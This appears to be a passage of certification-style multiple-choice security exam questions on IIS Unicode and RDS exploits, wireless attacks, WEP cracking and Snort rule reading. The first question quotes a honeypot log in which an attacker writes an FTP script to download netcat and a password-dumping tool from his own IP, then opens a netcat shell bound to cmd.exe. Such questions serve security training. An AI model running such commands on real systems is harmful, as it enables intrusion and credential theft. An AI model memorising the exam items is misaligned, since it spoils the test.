The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query that results in the commands shown below being run:
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k.
B. There are two attackers on the system johna2k and haxedj00.
C. The attack is a remote exploit and the hacker downloads three files.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
Paul has just finished setting up his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption and enabling MAC filtering on his wireless router. Paul notices that when he uses his wireless connection, the speed is sometimes 54 Mbps and sometimes only 24 Mbps or less. Paul connects to his wireless router's management utility and notices that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop.
What is Paul seeing here?
A. MAC Spoofing
B. Macof
C. ARP Spoofing
D. DNS Spoofing
Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs.
What is this attack most appropriately called?
A. Spoof Attack
B. Replay Attack
C. Inject Attack
D. Rebound Attack
On wireless networks, an SSID is used to identify the network. Why are SSIDs not considered to be a good security mechanism to protect a wireless network?
A. The SSID is only 32 bits in length
B. The SSID is transmitted in clear text
C. The SSID is to identify a station not a network
D. The SSID is the same as the MAC address for all vendors
In order to attack a wireless network, you put up an access point and override the signal of the real access point. When users send authentication data, you are able to capture it. What kind of attack is this?
A. WEP Attack
B. Drive by hacking
C. Rogue Access Point Attack
D. Unauthorized Access Point Attack
Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS mapping software application. What is the recommended and well-known GPS mapping package that would interface with PrismStumbler? Select the best answer.
A. GPSDrive
B. GPSMap
C. WinPcap
D. Microsoft Mappoint
Sally is a network admin for a small company. She was asked to install wireless access points in the building. In looking at the specifications for the access points, she sees that all of them offer WEP.
Which of these are true about WEP?
Select the best answer.
A. Stands for Wireless Encryption Protocol
B. It makes a WLAN as secure as a LAN
C. Stands for Wired Equivalent Privacy
D. It offers end to end security
Study the snort rule given below and interpret the rule.
alert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)
A. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet
B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet
C. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111
D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111
Why do you need to capture five to ten million packets in order to crack WEP with AirSnort?
A. All IVs are vulnerable to attack
B. AirSnort uses a cache of packets
C. AirSnort implements the FMS attack and only encrypted packets are counted
D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers
Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generate traffic on the network so that he can capture enough packets to crack the WEP key?
A. Use any ARP requests found in the capture
B. Derek can use a session replay on the packets captured
C. Derek can use KisMAC as it needs two USB devices to generate traffic
D. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic